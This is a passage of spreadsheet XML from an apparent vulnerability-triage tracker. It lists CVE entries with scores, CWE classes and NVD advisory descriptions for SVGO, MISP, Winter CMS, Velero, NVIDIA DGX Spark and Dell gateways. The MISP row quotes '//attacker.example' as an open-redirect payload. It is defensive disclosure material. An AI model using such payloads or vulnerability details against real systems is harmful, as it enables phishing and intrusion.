      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84369</t>
        </is>
      </c>
      <c r="D840" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E840" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F840" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I840" s="5" t="inlineStr"/>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr"/>
      <c r="L840" s="5" t="inlineStr"/>
      <c r="M840" s="5" t="inlineStr"/>
      <c r="N840" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O840" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P840" s="5" t="inlineStr"/>
      <c r="Q840" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R840" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 1.0.0 until versions 2.8.4, 3.3.5, and 4.1.0, the opt-in removeScripts plugin, named removeScriptElement in versions 2 and 3 and implemented in plugins/removeScripts.js, removes SVG and XHTML script elements but does not inspect executable HTML content inside SVG foreignObject elements. Event-handler attributes such as onload and onbeforetoggle, srcdoc documents, and executable URLs in the action, data, formaction, href, and src attributes can remain in attacker-controlled SVG input. When an application uses the plugin as its only protection and serves the optimized SVG in an active browser context, the payload can execute script in the viewer's origin, expose data, modify content, or perform actions as the victim. This issue is fixed in versions 2.8.4, 3.3.5, and 4.1.0.</t>
        </is>
      </c>
      <c r="S840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86351</t>
        </is>
      </c>
      <c r="D841" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E841" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I841" s="5" t="inlineStr"/>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L841" s="5" t="inlineStr"/>
      <c r="M841" s="5" t="inlineStr"/>
      <c r="N841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O841" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P841" s="5" t="inlineStr"/>
      <c r="Q841" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-601</t>
        </is>
      </c>
      <c r="R841" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP validate the user-configurable homepage by checking only whether the supplied path begins with /. That check is insufficient because protocol-relative URLs such as //attacker.example also begin with / but resolve to an external origin in browsers.
The vulnerable homepage value can be stored as a user setting and later used by the post-login routing logic. The commit explicitly identifies //attacker.example as a payload that passed validation and was emitted to the Location header after login.
The fix introduces a shared InternalRedirectValidator that rejects URLs containing a host, scheme, userinfo, unsafe leading // or /\, malformed URLs, and control characters. It also revalidates homepage settings on read so legacy or internally written unsafe values cannot bypass the new storage-time validation.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86351</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87640</t>
        </is>
      </c>
      <c r="D842" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E842" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I842" s="5" t="inlineStr"/>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L842" s="5" t="inlineStr"/>
      <c r="M842" s="5" t="inlineStr"/>
      <c r="N842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O842" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P842" s="5" t="inlineStr"/>
      <c r="Q842" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R842" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87640</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24225</t>
        </is>
      </c>
      <c r="D843" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E843" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F843" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I843" s="5" t="inlineStr"/>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="L843" s="5" t="inlineStr"/>
      <c r="M843" s="5" t="inlineStr"/>
      <c r="N843" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O843" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P843" s="5" t="inlineStr"/>
      <c r="Q843" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R843" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the standalone MM firmware where an attacker could be able to cause an out-of-bounds read. A successful exploit of this vulnerability might lead to information disclosure.</t>
        </is>
      </c>
      <c r="S843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24225</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25250</t>
        </is>
      </c>
      <c r="D844" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E844" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F844" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I844" s="5" t="inlineStr"/>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr"/>
      <c r="L844" s="5" t="inlineStr"/>
      <c r="M844" s="5" t="inlineStr"/>
      <c r="N844" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O844" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P844" s="5" t="inlineStr"/>
      <c r="Q844" s="5" t="inlineStr">
        <is>
          <t>CWE-325</t>
        </is>
      </c>
      <c r="R844" s="5" t="inlineStr">
        <is>
          <t>EAZ EazyFix 12.9 allows a Security Feature Bypass related to a "Missing Cryptographic Step" associated with "Secure Boot disable."</t>
        </is>
      </c>
      <c r="S844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25250</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47624</t>
        </is>
      </c>
      <c r="D845" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E845" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F845" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I845" s="5" t="inlineStr"/>
      <c r="J845" s="5" t="inlineStr"/>
      <c r="K845" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="L845" s="5" t="inlineStr"/>
      <c r="M845" s="5" t="inlineStr"/>
      <c r="N845" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O845" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P845" s="5" t="inlineStr"/>
      <c r="Q845" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R845" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in UEFI where a Attacker may cause a/an CWE-693 by privileged local user. A successful exploit of this vulnerability may allow an attacker to bypass administrator password protection in UEFi.</t>
        </is>
      </c>
      <c r="S845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47624</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53508</t>
        </is>
      </c>
      <c r="D846" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E846" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F846" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I846" s="5" t="inlineStr"/>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr"/>
      <c r="L846" s="5" t="inlineStr"/>
      <c r="M846" s="5" t="inlineStr"/>
      <c r="N846" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O846" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P846" s="5" t="inlineStr"/>
      <c r="Q846" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-73, CWE-918</t>
        </is>
      </c>
      <c r="R846" s="5" t="inlineStr">
        <is>
          <t>oasdiff is a command-line and Go package that compares and detects breaking changes in OpenAPI specs. From version 1.13.2 through version 1.18.0, oasdiff did not enforce --allow-external-refs=false (library: openapi3.Loader.IsExternalRefsAllowed = false) when loading a spec from a git revision (the rev:path form, e.g. main:openapi.yaml). External $refs were resolved on that load path even when external refs were explicitly disabled, so the mitigation silently did not apply there. This issue has been patched in version 1.18.1.</t>
        </is>
      </c>
      <c r="S846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53508</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21105</t>
        </is>
      </c>
      <c r="D847" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E847" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F847" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I847" s="5" t="inlineStr"/>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr"/>
      <c r="L847" s="5" t="inlineStr"/>
      <c r="M847" s="5" t="inlineStr"/>
      <c r="N847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O847" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P847" s="5" t="inlineStr"/>
      <c r="Q847" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R847" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Collection prior to version 1.0.1.14 in Android 15 and 2.0.02.7 in Android 16 allows local attackers to access sensitive information.</t>
        </is>
      </c>
      <c r="S847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21105</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32593</t>
        </is>
      </c>
      <c r="D848" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E848" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F848" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I848" s="5" t="inlineStr"/>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr"/>
      <c r="L848" s="5" t="inlineStr"/>
      <c r="M848" s="5" t="inlineStr"/>
      <c r="N848" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O848" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P848" s="5" t="inlineStr"/>
      <c r="Q848" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R848" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions up to and including 1.2.12, the backend Filter widget is vulnerable to SQL injection through the numberrange scope type when that scope is configured with a conditions key, allowing an authenticated backend user to inject arbitrary SQL. The scope's filter values are interpolated into the conditions statement without parameter binding, so a user with access to a list view whose filter uses this scope and configuration can supply crafted input through the filter's AJAX handler and read arbitrary database contents. No built-in Winter CMS backend views use this scope type and configuration combination, so exploitation requires a third-party plugin to have registered a numberrange filter scope with a conditions key, and a vanilla installation without such plugins is not affected. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32593</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32637</t>
        </is>
      </c>
      <c r="D849" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E849" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F849" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I849" s="5" t="inlineStr"/>
      <c r="J849" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K849" s="5" t="inlineStr"/>
      <c r="L849" s="5" t="inlineStr"/>
      <c r="M849" s="5" t="inlineStr"/>
      <c r="N849" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O849" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P849" s="5" t="inlineStr"/>
      <c r="Q849" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R849" s="5" t="inlineStr">
        <is>
          <t>Velero is an open source tool for backing up, restoring, and migrating Kubernetes cluster resources and persistent volumes. Prior to 1.18.1, an attacker who compromises the backup object-storage backend can upload a malicious backup tarball containing parent-directory paths that escape the extraction directory during restore and overwrite sensitive files in the Velero pod filesystem. This issue is fixed in version 1.18.1.</t>
        </is>
      </c>
      <c r="S849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32637</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45404</t>
        </is>
      </c>
      <c r="D850" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E850" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F850" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I850" s="5" t="inlineStr"/>
      <c r="J850" s="5" t="inlineStr"/>
      <c r="K850" s="5" t="inlineStr"/>
      <c r="L850" s="5" t="inlineStr"/>
      <c r="M850" s="5" t="inlineStr"/>
      <c r="N850" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O850" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P850" s="5" t="inlineStr"/>
      <c r="Q850" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-667</t>
        </is>
      </c>
      <c r="R850" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From version 0.11.0 through 1.44.0, the OpenTracing bridge's bridgeSpan contains an unsynchronized extraBaggageItems map which can cause a panic. Because Go maps are not safe for concurrent read/write access, concurrent SetBaggageItem and correlation.MapFromContext calls on the same hooked bridgeSpan can trigger a fatal runtime error—such as concurrent map read and map write or concurrent map iteration and map write—terminating the process and causing denial of service. This issue is fixed in version 1.45.0.</t>
        </is>
      </c>
      <c r="S850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45404</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67395</t>
        </is>
      </c>
      <c r="D851" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E851" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F851" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I851" s="5" t="inlineStr"/>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr"/>
      <c r="L851" s="5" t="inlineStr"/>
      <c r="M851" s="5" t="inlineStr"/>
      <c r="N851" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O851" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P851" s="5" t="inlineStr"/>
      <c r="Q851" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R851" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability exists in Sage Employee Self Service’s custom logo functionality due to improper validation of file path parameters. By leveraging directory traversal sequences and their encoded variants, an attacker may bypass directory restrictions and access files outside the application's intended file system scope. Successful exploitation would require knowledge of valid file names and paths.
Depending on the privileges of the affected component, exploitation could result in the disclosure of sensitive information, including configuration files, environment settings, application assets, and log data.
The vulnerability has been remediated through enhanced path validation and secure path resolution controls that prevent access to unauthorised locations.</t>
        </is>
      </c>
      <c r="S851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67395</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78483</t>
        </is>
      </c>
      <c r="D852" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E852" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F852" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G852" s="5" t="inlineStr"/>
      <c r="H852" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I852" s="5" t="inlineStr"/>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L852" s="5" t="inlineStr"/>
      <c r="M852" s="5" t="inlineStr"/>
      <c r="N852" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O852" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P852" s="5" t="inlineStr"/>
      <c r="Q852" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R85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S852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78483</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78489</t>
        </is>
      </c>
      <c r="D853" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E853" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F853" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G853" s="5" t="inlineStr"/>
      <c r="H853" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I853" s="5" t="inlineStr"/>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L853" s="5" t="inlineStr"/>
      <c r="M853" s="5" t="inlineStr"/>
      <c r="N853" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O853" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P853" s="5" t="inlineStr"/>
      <c r="Q853" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R85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S853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78489</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79962</t>
        </is>
      </c>
      <c r="D854" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E854" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G854" s="5" t="inlineStr"/>
      <c r="H854" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I854" s="5" t="inlineStr"/>
      <c r="J854" s="5" t="inlineStr"/>
      <c r="K854" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L854" s="5" t="inlineStr"/>
      <c r="M854" s="5" t="inlineStr"/>
      <c r="N854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O854" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P854" s="5" t="inlineStr"/>
      <c r="Q854" s="5" t="inlineStr">
        <is>
          <t>CWE-567</t>
        </is>
      </c>
      <c r="R854" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="S854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79962</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79968</t>
        </is>
      </c>
      <c r="D855" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E855" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G855" s="5" t="inlineStr"/>
      <c r="H855" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I855" s="5" t="inlineStr"/>
      <c r="J855" s="5" t="inlineStr"/>
      <c r="K855" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L855" s="5" t="inlineStr"/>
      <c r="M855" s="5" t="inlineStr"/>
      <c r="N855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O855" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P855" s="5" t="inlineStr"/>
      <c r="Q855" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R855"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S855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79968</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79969</t>
        </is>
      </c>
      <c r="D856" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E856" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G856" s="5" t="inlineStr"/>
      <c r="H856" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I856" s="5" t="inlineStr"/>
      <c r="J856" s="5" t="inlineStr"/>
      <c r="K856" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L856" s="5" t="inlineStr"/>
      <c r="M856" s="5" t="inlineStr"/>
